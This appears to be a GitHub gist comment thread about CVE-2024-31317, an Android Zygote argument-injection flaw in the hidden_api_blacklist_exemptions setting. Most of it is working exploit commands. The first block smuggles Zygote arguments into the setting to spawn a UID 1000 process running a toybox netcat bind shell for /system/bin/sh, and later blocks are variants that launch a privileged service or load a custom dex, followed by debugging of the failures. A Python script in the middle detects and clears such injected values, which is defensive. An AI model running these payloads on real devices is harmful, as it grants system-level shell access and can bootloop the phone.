```shell
am force-stop com.android.settings
settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
15
--runtime-args
--setuid=1000
--setgid=1000
--runtime-flags=2049
--mount-external-full
--target-sdk-version=29
--setgroups=3003
--nice-name=runnetcat
--seinfo=platform:su:targetSdkVersion=29:complete
--invoke-with
toybox nc -s 127.0.0.1 -p 1234 -L /system/bin/sh -l;
--instruction-set=arm
--app-data-dir=/data/
--package-name=com.android.settings
android.app.ActivityThread
"
am start -a android.settings.SETTINGS
nc localhost 1234
```
@Bonveio were you able to achieve something like this https://gist.github.com/ybtag/db3f3595139556c773fb94b7cbe668b5?permalink_comment_id=5535933#gistcomment-5535933 ?
From what I understand of the PoC, it's impossible to initialize the exploit without UID 2000 (the shell user), which you can only achieve externally using adb (if the device is not rooted; if it is rooted I think you can run adbd from a superuser shell). But the running netcat shell server with UID 1000 privilege listening on 0.0.0.0 is accessible by any Android app on the device, like Termux. Just be careful to remove the hidden_api_blacklist_exemptions before rebooting/restarting the device, or else the device will end up in a bootloop.
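A defender-side triage check for the setting this thread revolves around, added here as an example and not part of the gist or any comment: it inspects the raw value of `hidden_api_blacklist_exemptions` (as returned by `settings get global hidden_api_blacklist_exemptions`) and flags values that carry newline-separated Zygote arguments instead of a legitimate comma-separated list of hidden-API member signatures. The sample values are constructed; the wrapper command in the injected sample is a placeholder.

```python
import re

# Legitimate entries look like "Landroid/os/Foo;->bar(I)V": one line, comma separated,
# never containing Zygote command arguments. Any of these markers means a forked
# command was smuggled into the setting (CVE-2024-31317 style injection).
ZYGOTE_MARKERS = (
    "--runtime-args", "--setuid=", "--setgid=", "--seinfo=", "--invoke-with",
    "android.app.ActivityThread", "com.android.internal.os.WrapperInit",
)


def inspect_exemptions(value: str) -> dict:
    """Triage the raw hidden_api_blacklist_exemptions value and report findings."""
    findings = []
    if "\n" in value:
        findings.append("value spans multiple lines; Zygote reads arguments line by line")
    for marker in ZYGOTE_MARKERS:
        if marker in value:
            findings.append(f"Zygote argument marker present: {marker}")

    # Which UID the injected process would run as (1000 == system).
    injected_uid = None
    m = re.search(r"^--setuid=(\d+)$", value, re.MULTILINE)
    if m:
        injected_uid = int(m.group(1))

    # The line following --invoke-with is the wrapper command Zygote would exec.
    wrapper = None
    m = re.search(r"^--invoke-with\n(.+)$", value, re.MULTILINE)
    if m:
        wrapper = m.group(1).strip()

    return {
        "suspicious": bool(findings),
        "findings": findings,
        "injected_uid": injected_uid,
        "wrapper_command": wrapper,
    }


# Constructed sample values so the check runs stand-alone (not taken from a device).
BENIGN = "Landroid/os/Foo;->bar(I)V,Landroid/os/Baz;->qux()V"
INJECTED = (
    "LClass1;->method1(\n4\n--runtime-args\n--setuid=1000\n"
    "--invoke-with\nplaceholder-wrapper ;\n"
)

if __name__ == "__main__":
    for label, raw in (("benign", BENIGN), ("injected", INJECTED)):
        print(label, inspect_exemptions(raw))
```

If the check fires, `settings delete global hidden_api_blacklist_exemptions` (from a shell with the rights to change global settings) clears the value, which matters because the comment above notes the device bootloops if the injected value is still there on restart.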
@Bonveio yes, we have to execute this exploit with shell access (UID 2000), and there are ways I'm aware of to achieve that. My main question is that even though I run this netcat with system privileges, I am not able to utilize its benefits, such as calling privileged methods during runtime etc., via my custom application. I think there are ways to get back and forth communication using this exploit, but I am not able to figure it out.
This is way beyond my knowledge, I'm sorry, I might not be able to help you with that matter, but I'm happy to test the custom application you're trying to build so I can report or suggest something that might be helpful for your development.
For example, if I do something like this:
```shell
settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
15
--runtime-args
--setuid=1000
--setgid=1000
--runtime-flags=2049
--mount-external-full
--target-sdk-version=29
--setgroups=3003
--nice-name=runnetcat
--seinfo=platform:su:targetSdkVersion=29:complete
--invoke-with
am start-foreground-service -n com.user.helloworld/.PrivilegedService;
--instruction-set=arm
--app-data-dir=/data/
--package-name=com.android.settings
android.app.ActivityThread
"
```
Then the Settings app crashes on opening, and the command `am start-foreground-service -n com.user.helloworld/.PrivilegedService;` present in --invoke-with doesn't get invoked properly.
Following this - https://blog.flanker017.me/cve-2024-31317/
I tried to do something like this:
```shell
settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
18
--runtime-args
--setuid=1000
--setgid=1000
--runtime-flags=2049
--mount-external-full
--target-sdk-version=29
--setgroups=3003
--nice-name=hello_world_zygote
--seinfo=platform:system_app:targetSdkVersion=29:complete
--instruction-set=arm
--app-data-dir=/data/
--package-name=com.android.settings
com.android.internal.os.WrapperInit
0
29
-cp
/data/local/tmp/classes.dex
com.test.user.helloworld.WrapperCustom
"
```
But it is throwing an "Already cached" exception:
```text
java.lang.IllegalStateException: Already cached.
    at android.app.ApplicationLoaders.createAndCacheNonBootclasspathSystemClassLoaders(ApplicationLoaders.java:148)
    at com.android.internal.os.ZygoteInit.cacheNonBootClasspathClassLoaders(ZygoteInit.java:374)
    at com.android.internal.os.ZygoteInit.preload(ZygoteInit.java:144)
    at com.android.internal.os.WrapperInit.main(WrapperInit.java:83)
    at java.lang.reflect.Method.invoke(Native Method)
    at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:492)
    at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:930)
```